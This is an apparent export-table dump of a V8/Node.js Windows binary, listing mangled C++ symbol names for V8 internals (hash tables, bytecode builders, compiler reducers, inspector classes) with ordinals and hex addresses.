                                  ??$ToBytecodeArray@VIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVIsolate@23@HHV?$Handle@VByteArray@internal@v8@@@23@@Z1280x140888ce0
                                  ??$ToBytecodeArray@VOffThreadIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVOffThreadIsolate@23@@Z1290x14088ef40
                                  ??$ToBytecodeArray@VOffThreadIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@PEAVOffThreadIsolate@23@HHV?$Handle@VByteArray@internal@v8@@@23@@Z1300x140888dc0
                                  ??$ToFixedArray@VIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@PEAVIsolate@23@@Z1310x14086d0d0
                                  ??$ToFixedArray@VOffThreadIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@PEAVOffThreadIsolate@23@@Z1320x14086d2e0
                                  ??$ToSourcePositionTable@VIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVIsolate@23@@Z1330x14088efe0
                                  ??$ToSourcePositionTable@VIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVIsolate@23@@Z1340x140888ea0
                                  ??$ToSourcePositionTable@VIsolate@internal@v8@@@SourcePositionTableBuilder@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@12@PEAVIsolate@12@@Z1350x1409d8e20
                                  ??$ToSourcePositionTable@VOffThreadIsolate@internal@v8@@@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVOffThreadIsolate@23@@Z1360x14088f000
                                  ??$ToSourcePositionTable@VOffThreadIsolate@internal@v8@@@BytecodeArrayWriter@interpreter@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@23@PEAVOffThreadIsolate@23@@Z1370x140888ee0
                                  ??$ToSourcePositionTable@VOffThreadIsolate@internal@v8@@@SourcePositionTableBuilder@internal@v8@@QEAA?AV?$Handle@VByteArray@internal@v8@@@12@PEAVOffThreadIsolate@12@@Z1380x1409d8ea0
                                  ??$UnsignedDivisionByConstant@I@base@v8@@YA?AU?$MagicNumbersForDivision@I@01@II@Z1390x141047130
                                  ??$UnsignedDivisionByConstant@_K@base@v8@@YA?AU?$MagicNumbersForDivision@_K@01@_KI@Z1400x141047260
                                  ??$WriteBarrierForRange@VFullObjectSlot@internal@v8@@@Heap@internal@v8@@QEAAXVHeapObject@12@VFullObjectSlot@12@1@Z1410x1409249a0
                                  ??$WriteToFlat@G@String@internal@v8@@SAXV012@PEAGHH@Z1420x1407476a0
                                  ??0?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA@_K@Z1430x140076a70
                                  ??0?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA@XZ1440x1400cbb20
                                  ??0?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA@_K@Z1450x140076a70
                                  ??0?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA@XZ1460x1400cbb20
                                  ??0?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA@_K@Z1470x140076a70
                                  ??0?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA@XZ1480x1400cbb20
                                  ??0?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA@_K@Z1490x140076a70
                                  ??0?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA@XZ1500x1400cbb20
                                  ??0?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z1510x140076a70
                                  ??0?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA@XZ1520x1400cbb20
                                  ??0?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z1530x140076a70
                                  ??0?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA@XZ1540x1400cbb20
                                  ??0?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@IEAA@_K@Z1550x140076a70
                                  ??0?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAA@XZ1560x1400cbb20
                                  ??0?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@IEAA@_K@Z1570x140076a70
                                  ??0?$HashTable@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@QEAA@XZ1580x1400cbb20
                                  ??0?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA@_K@Z1590x140076a70
                                  ??0?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA@XZ1600x1400cbb20
                                  ??0?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA@_K@Z1610x140076a70
                                  ??0?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA@XZ1620x1400cbb20
                                  ??0?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z1630x140076a70
                                  ??0?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA@XZ1640x1400cbb20
                                  ??0?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@IEAA@_K@Z1650x140076a70
                                  ??0?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAA@XZ1660x1400cbb20
                                  ??0?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA@_K@Z1670x140076a70
                                  ??0?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA@XZ1680x1400cbb20
                                  ??0?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@IEAA@_K@Z1690x140076a70
                                  ??0?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA@XZ1700x1400cbb20
                                  ??0?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@IEAA@_K@Z1710x140076a70
                                  ??0?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAA@XZ1720x1400cbb20
                                  ??0?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@IEAA@_K@Z1730x140076a70
                                  ??0?$HashTable@VStringTable@internal@v8@@VStringTableShape@23@@internal@v8@@QEAA@XZ1740x1400cbb20
                                  ??0?$MagicNumbersForDivision@I@base@v8@@QEAA@II_N@Z1750x1410473c0
                                  ??0?$MagicNumbersForDivision@_K@base@v8@@QEAA@_KI_N@Z1760x1410473d0
                                  ??0?$MemorySpan@$$CBD@v8@@QEAA@PEBD_K@Z1770x1406d4500
                                  ??0?$MemorySpan@$$CBD@v8@@QEAA@XZ1780x1403e7f20
                                  ??0?$MemorySpan@$$CBE@v8@@QEAA@PEBE_K@Z1790x1406d4500
                                  ??0?$MemorySpan@$$CBE@v8@@QEAA@XZ1800x1403e7f20
                                  ??0?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@IEAA@_K@Z1810x140076a70
                                  ??0?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VEphemeronHashTableShape@23@@internal@v8@@QEAA@XZ1820x1400cbb20
                                  ??0?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA@_K@Z1830x140076a70
                                  ??0?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA@XZ1840x1400cbb20
                                  ??0?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@IEAA@_K@Z1850x140076a70
                                  ??0?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAA@XZ1860x1400cbb20
                                  ??0?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@IEAA@_K@Z1870x140076a70
                                  ??0?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAA@XZ1880x1400cbb20
                                  ??0?$ParserBase@VParser@internal@v8@@@internal@v8@@QEAA@PEAVZone@12@PEAVScanner@12@_KPEAVExtension@2@PEAVAstValueFactory@12@PEAVPendingCompilationErrorHandler@12@PEAVRuntimeCallStats@12@PEAVLogger@12@VUnoptimizedCompileFlags@12@_N@Z1890x1406f7f60
                                  ??0?$PerIsolateAssertScope@$00$00@internal@v8@@QEAA@PEAVIsolate@12@@Z1900x1409d71e0
                                  ??0?$PerIsolateAssertScope@$00$0A@@internal@v8@@QEAA@PEAVIsolate@12@@Z1910x1409d7200
                                  ??0?$PerIsolateAssertScope@$01$00@internal@v8@@QEAA@PEAVIsolate@12@@Z1920x1409d7220
                                  ??0?$PerIsolateAssertScope@$01$0A@@internal@v8@@QEAA@PEAVIsolate@12@@Z1930x1409d7240
                                  ??0?$PerIsolateAssertScope@$02$00@internal@v8@@QEAA@PEAVIsolate@12@@Z1940x1409d7260
                                  ??0?$PerIsolateAssertScope@$02$0A@@internal@v8@@QEAA@PEAVIsolate@12@@Z1950x1409d7280
                                  ??0?$PerIsolateAssertScope@$03$00@internal@v8@@QEAA@PEAVIsolate@12@@Z1960x1409d72a0
                                  ??0?$PerIsolateAssertScope@$03$0A@@internal@v8@@QEAA@PEAVIsolate@12@@Z1970x1409d72c0
                                  ??0?$PerIsolateAssertScope@$04$00@internal@v8@@QEAA@PEAVIsolate@12@@Z1980x1409d72e0
                                  ??0?$PerIsolateAssertScope@$04$0A@@internal@v8@@QEAA@PEAVIsolate@12@@Z1990x1409d7300
                                  ??0?$PerIsolateAssertScope@$0A@$00@internal@v8@@QEAA@PEAVIsolate@12@@Z2000x1409d7320
                                  ??0?$PerIsolateAssertScope@$0A@$0A@@internal@v8@@QEAA@PEAVIsolate@12@@Z2010x1409d7340
                                  ??0?$PerThreadAssertScope@$00$00@internal@v8@@QEAA@XZ2020x1409d7360
                                  ??0?$PerThreadAssertScope@$00$0A@@internal@v8@@QEAA@XZ2030x1409d73e0
                                  ??0?$PerThreadAssertScope@$01$00@internal@v8@@QEAA@XZ2040x1409d7460
                                  ??0?$PerThreadAssertScope@$01$0A@@internal@v8@@QEAA@XZ2050x1409d74e0
                                  ??0?$PerThreadAssertScope@$02$00@internal@v8@@QEAA@XZ2060x1409d7560
                                  ??0?$PerThreadAssertScope@$02$0A@@internal@v8@@QEAA@XZ2070x1409d75e0
                                  ??0?$PerThreadAssertScope@$0A@$00@internal@v8@@QEAA@XZ2080x1409d7660
                                  ??0?$PerThreadAssertScope@$0A@$0A@@internal@v8@@QEAA@XZ2090x1409d76d0
                                  ??0?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@IEAA@_J@Z2100x140076a70
                                  ??0?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@IEAA@_J@Z2110x140076a70
                                  ??0?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@IEAA@_J@Z2120x140076a70
                                  ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@AEBV012@@Z2130x140451f40
                                  ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@PEAVZone@12@@Z2140x140451f60
                                  ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@V?$initializer_list@PEAVMoveOperands@compiler@internal@v8@@@std@@PEAVZone@12@@Z2150x140451f80
                                  ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@_KPEAVMoveOperands@compiler@12@PEAVZone@12@@Z2160x140452010
                                  ??0?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@QEAA@_KPEAVZone@12@@Z2170x140452080
                                  ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ2180x140456e70
                                  ??0?$basic_ios@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z2190x140456e90
                                  ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@IEAA@$$QEAV01@@Z2200x140456ed0
                                  ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z2210x1400c8720
                                  ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@W4_Uninitialized@1@_N@Z2220x140456f80
                                  ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@AEBV01@@Z2230x140457000
                                  ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@W4_Uninitialized@1@@Z2240x140457110
                                  ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ2250x1400bf9d0
                                  ??0?$enable_shared_from_this@VCounters@V8Inspector@v8_inspector@@@std@@IEAA@AEBV01@@Z2260x1403e7f20
                                  ??0?$enable_shared_from_this@VCounters@V8Inspector@v8_inspector@@@std@@IEAA@XZ2270x1403e7f20
                                  ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@$$QEAV01@@Z2280x1404521a0
                                  ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@$$QEAV01@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2290x1404521d0
                                  ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@AEBV01@@Z2300x140452200
                                  ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@AEBV01@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2310x1404522c0
                                  ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2320x140452380
                                  ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@V?$initializer_list@PEAVMoveOperands@compiler@internal@v8@@@1@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2330x1404523a0
                                  ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@XZ2340x140452420
                                  ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@_KAEBQEAVMoveOperands@compiler@internal@v8@@AEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@45@@Z2350x140452430
                                  ??0?$vector@PEAVMoveOperands@compiler@internal@v8@@V?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@34@@std@@QEAA@_KAEBV?$ZoneAllocator@PEAVMoveOperands@compiler@internal@v8@@@internal@v8@@@Z2360x1404524a0
                                  ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@$$QEAV01@@Z2370x1400790a0
                                  ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@$$QEAV01@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2380x140079060
                                  ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@AEBV01@@Z2390x14007a190
                                  ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@AEBV01@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2400x14007a190
                                  ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2410x140079310
                                  ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@V?$initializer_list@UCpuProfileDeoptFrame@v8@@@1@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2420x14007a220
                                  ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@XZ2430x140079310
                                  ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@_KAEBUCpuProfileDeoptFrame@v8@@AEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2440x14007a2c0
                                  ??0?$vector@UCpuProfileDeoptFrame@v8@@V?$allocator@UCpuProfileDeoptFrame@v8@@@std@@@std@@QEAA@_KAEBV?$allocator@UCpuProfileDeoptFrame@v8@@@1@@Z2450x14007a340
                                  ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@$$QEAV01@@Z2460x1400790a0
                                  ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@$$QEAV01@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2470x140079060
                                  ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@AEBV01@@Z2480x140079100
                                  ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@AEBV01@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2490x140079100
                                  ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2500x140079310
                                  ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@V?$initializer_list@UCpuProfileDeoptInfo@v8@@@1@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2510x140079170
                                  ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@XZ2520x140079310
                                  ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@_KAEBUCpuProfileDeoptInfo@v8@@AEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2530x1400791f0
                                  ??0?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@QEAA@_KAEBV?$allocator@UCpuProfileDeoptInfo@v8@@@1@@Z2540x140079260
                                  ??0AbstractBytecodeArray@interpreter@internal@v8@@QEAA@AEBV0123@@Z2550x1406778c0
                                  ??0AbstractBytecodeArray@interpreter@internal@v8@@QEAA@XZ2560x1406778c0
                                  ??0AccountingAllocator@internal@v8@@QEAA@XZ2570x14041d2d0
                                  ??0ActivityControl@v8@@QEAA@AEBV01@@Z2580x140077d90
                                  ??0ActivityControl@v8@@QEAA@XZ2590x140077d90
                                  ??0AddTypeAssertionsReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@@Z2600x140ee53d0
                                  ??0AddressToTraceMap@internal@v8@@QEAA@$$QEAV012@@Z2610x1406d9b70
                                  ??0AddressToTraceMap@internal@v8@@QEAA@AEBV012@@Z2620x1406d9bd0
                                  ??0AddressToTraceMap@internal@v8@@QEAA@XZ2630x1406d9c30
                                  ??0AllocationProfile@v8@@QEAA@AEBV01@@Z2640x140077da0
                                  ??0AllocationProfile@v8@@QEAA@XZ2650x140077da0
                                  ??0Allocator@ArrayBuffer@v8@@QEAA@AEBV012@@Z2660x1400775b0
                                  ??0Allocator@ArrayBuffer@v8@@QEAA@XZ2670x1400775b0
                                  ??0AllowJavascriptExecutionScope@Isolate@v8@@QEAA@PEAV12@@Z2680x140a77210
                                  ??0ArrayBufferAllocator@node@@QEAA@$$QEAV01@@Z2690x140077e30
                                  ??0ArrayBufferAllocator@node@@QEAA@AEBV01@@Z2700x140077e30
                                  ??0ArrayBufferAllocator@node@@QEAA@XZ2710x140077e30
                                  ??0AsmCallableType@wasm@internal@v8@@IEAA@XZ2720x140a62980
                                  ??0AsmFunctionType@wasm@internal@v8@@IEAA@PEAVZone@23@PEAVAsmType@123@@Z2730x140a62990
                                  ??0AsmJsOffsetInformation@wasm@internal@v8@@QEAA@V?$Vector@$$CBE@23@@Z2740x140527170
                                  ??0AsmJsScanner@internal@v8@@QEAA@$$QEAV012@@Z2750x140a64a80
                                  ??0AsmJsScanner@internal@v8@@QEAA@AEBV012@@Z2760x140a64b70
                                  ??0AsmJsScanner@internal@v8@@QEAA@PEAVUtf16CharacterStream@12@@Z2770x140a64c40
                                  ??0AsmOverloadedFunctionType@wasm@internal@v8@@AEAA@PEAVZone@23@@Z2780x140a629c0
                                  ??0Assembler@internal@v8@@QEAA@AEBUAssemblerOptions@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z2790x1404a03d0
                                  ??0AssemblerBase@internal@v8@@QEAA@AEBUAssemblerOptions@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z2800x1409fa870
                                  ??0AssemblerOptions@internal@v8@@QEAA@XZ2810x140435b50
                                  ??0AsyncResource@node@@QEAA@PEAVIsolate@v8@@V?$Local@VObject@v8@@@3@PEBDN@Z2820x14024c810
                                  ??0BackgroundCompileTask@internal@v8@@QEAA@PEAUScriptStreamingData@12@PEAVIsolate@12@@Z2830x1409ed970
                                  ??0BackgroundCompileTask@internal@v8@@QEAA@PEBVParseInfo@12@PEBVAstRawString@12@PEBVFunctionLiteral@12@PEAVWorkerThreadRuntimeCallStats@12@PEAVTimedHistogram@12@H@Z2840x1409edba0
                                  ??0BackgroundScope@GCTracer@internal@v8@@QEAA@PEAV123@W4ScopeId@0123@PEAVRuntimeCallStats@23@@Z2850x14093e6c0
                                  ??0BackingStore@internal@v8@@AEAA@PEAX_K1W4SharedFlag@12@_N3333@Z2860x14041d2f0
                                  ??0BackupIncumbentScope@Context@v8@@QEAA@V?$Local@VContext@v8@@@2@@Z2870x140a772a0
                                  ??0BasicBlock@compiler@internal@v8@@QEAA@PEAVZone@23@VId@0123@@Z2880x140e41380
                                  ??0BigIntToI32PairDescriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z2890x140457120
                                  ??0BigIntToI32PairDescriptor@internal@v8@@QEAA@$$QEAV012@@Z2900x140457150
                                  ??0BigIntToI32PairDescriptor@internal@v8@@QEAA@AEBV012@@Z2910x140457150
                                  ??0BigIntToI32PairDescriptor@internal@v8@@QEAA@XZ2920x140457170
                                  ??0BigIntToI64Descriptor@internal@v8@@IEAA@W4Key@CallDescriptors@12@@Z2930x140457190
                                  ??0BigIntToI64Descriptor@internal@v8@@QEAA@$$QEAV012@@Z2940x1404571c0
                                  ??0BigIntToI64Descriptor@internal@v8@@QEAA@AEBV012@@Z2950x1404571c0
                                  ??0BigIntToI64Descriptor@internal@v8@@QEAA@XZ2960x1404571e0
                                  ??0Bignum@internal@v8@@QEAA@XZ2970x140847620
                                  ??0Binary@protocol@v8_inspector@@AEAA@V?$shared_ptr@V?$vector@EV?$allocator@E@std@@@std@@@std@@@Z2980x1403e7e60
                                  ??0Binary@protocol@v8_inspector@@QEAA@$$QEAV012@@Z2990x1403e7ef0
                                  ??0Binary@protocol@v8_inspector@@QEAA@AEBV012@@Z3000x1400773f0
                                  ??0Binary@protocol@v8_inspector@@QEAA@XZ3010x1403e7f20
                                  ??0BitVector@internal@v8@@QEAA@AEBV012@PEAVZone@12@@Z3020x140452510
                                  ??0BitVector@internal@v8@@QEAA@HPEAVZone@12@@Z3030x1404525b0
                                  ??0BitVector@internal@v8@@QEAA@XZ3040x140452680
                                  ??0BlockBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVBreakableStatement@23@@Z3050x14086b950
                                  ??0BlockData@Coverage@debug@v8@@AEAA@PEAUCoverageBlock@internal@3@V?$shared_ptr@VCoverage@internal@v8@@@std@@@Z3060x14041d360
                                  ??0BlockData@Coverage@debug@v8@@QEAA@$$QEAV0123@@Z3070x14041d390
                                  ??0BookmarkScope@Scanner@internal@v8@@QEAA@PEAV123@@Z3080x14041d3c0
                                  ??0BoundedPageAllocator@base@v8@@QEAA@PEAVPageAllocator@2@_K11@Z3090x140dc9d10
                                  ??0BranchElimination@compiler@internal@v8@@QEAA@AEBV0123@@Z3100x140e79280
                                  ??0BranchElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@W4Phase@0123@@Z3110x140eff350
                                  ??0BranchMatcher@compiler@internal@v8@@QEAA@PEAVNode@123@@Z3120x140ff30a0
                                  ??0BreakIterator@internal@v8@@QEAA@V?$Handle@VDebugInfo@internal@v8@@@12@@Z3130x1409bdc90
                                  ??0BreakLocation@debug@v8@@QEAA@HHW4BreakLocationType@12@@Z3140x14041d3e0
                                  ??0BreakableControlFlowBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVAstNode@23@@Z3150x14086b980
                                  ??0ByteData@PreparseDataBuilder@internal@v8@@QEAA@XZ3160x14041d410
                                  ??0BytecodeAnalysis@compiler@internal@v8@@QEAA@V?$Handle@VBytecodeArray@internal@v8@@@23@PEAVZone@23@VBailoutId@23@_N@Z3170x140e9f4b0
                                  ??0BytecodeArrayAccessor@interpreter@internal@v8@@QEAA@V?$Handle@VBytecodeArray@internal@v8@@@23@H@Z3180x14089a750
                                  ??0BytecodeArrayAccessor@interpreter@internal@v8@@QEAA@V?$unique_ptr@VAbstractBytecodeArray@interpreter@internal@v8@@U?$default_delete@VAbstractBytecodeArray@interpreter@internal@v8@@@std@@@std@@H@Z3190x14089a7c0
                                  ??0BytecodeArrayBuilder@interpreter@internal@v8@@QEAA@PEAVZone@23@HHPEAVFeedbackVectorSpec@23@W4RecordingMode@SourcePositionTableBuilder@23@@Z3200x14088f020
                                  ??0BytecodeArrayIterator@interpreter@internal@v8@@QEAA@V?$Handle@VBytecodeArray@internal@v8@@@23@@Z3210x14088a260
                                  ??0BytecodeArrayIterator@interpreter@internal@v8@@QEAA@V?$unique_ptr@VAbstractBytecodeArray@interpreter@internal@v8@@U?$default_delete@VAbstractBytecodeArray@interpreter@internal@v8@@@std@@@std@@@Z3220x14088a280
                                  ??0BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAA@V?$Handle@VBytecodeArray@internal@v8@@@23@PEAVZone@23@@Z3230x140889eb0
                                  ??0BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAA@V?$unique_ptr@VAbstractBytecodeArray@interpreter@internal@v8@@U?$default_delete@VAbstractBytecodeArray@interpreter@internal@v8@@@std@@@std@@PEAVZone@23@@Z3240x140889ef0
                                  ??0BytecodeArrayWriter@interpreter@internal@v8@@QEAA@PEAVZone@23@PEAVConstantArrayBuilder@123@W4RecordingMode@SourcePositionTableBuilder@23@@Z3250x140888f20
                                  ??0BytecodeIterator@wasm@internal@v8@@QEAA@$$QEAV0123@@Z3260x140515980
                                  ??0BytecodeIterator@wasm@internal@v8@@QEAA@AEBV0123@@Z3270x140515980
                                  ??0BytecodeIterator@wasm@internal@v8@@QEAA@PEBE0PEAUBodyLocalDecls@123@@Z3280x1405afa10
                                  ??0BytecodeJumpTable@interpreter@internal@v8@@QEAA@_KHHPEAVZone@23@@Z3290x140874f30
                                  ??0BytecodeLabel@interpreter@internal@v8@@QEAA@XZ3300x140869a80
                                  ??0BytecodeLabels@interpreter@internal@v8@@QEAA@PEAVZone@23@@Z3310x140869a90
